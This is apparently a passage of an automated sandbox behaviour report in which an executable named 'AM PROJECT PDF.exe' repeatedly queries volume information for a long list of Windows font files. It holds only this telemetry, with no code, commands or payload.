Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
